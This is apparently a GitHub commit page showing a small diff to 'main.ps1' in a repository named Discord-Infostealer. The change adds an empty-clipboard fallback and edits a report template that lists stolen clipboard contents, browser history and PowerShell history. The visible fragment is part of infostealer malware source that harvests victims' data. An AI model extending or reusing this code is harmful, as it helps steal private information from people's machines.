Skip to content

Commit

Permalink
Update main.ps1
Browse files Browse the repository at this point in the history
  • Loading branch information
beigeworm authored Dec 31, 2024
1 parent 6437f06 commit aee5948
Showing 1 changed file with 4 additions and 1 deletion.
5 changes: 4 additions & 1 deletion Discord-Infostealer/main.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -289,6 +289,9 @@ $debugDetect = "Debugging Check : $debugD"


$clipboard = Get-Clipboard
if (!($clipboard)){
$clipboard = "No Data Found.."
}
# History and Bookmark Data
$Expression = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
$Paths = @{
Expand Down Expand Up @@ -489,7 +492,7 @@ $clipboard
Browser History
---------------------------------------
$Value
$entry
Powershell History
---------------------------------------
Expand Down

0 comments on commit aee5948

Please sign in to comment.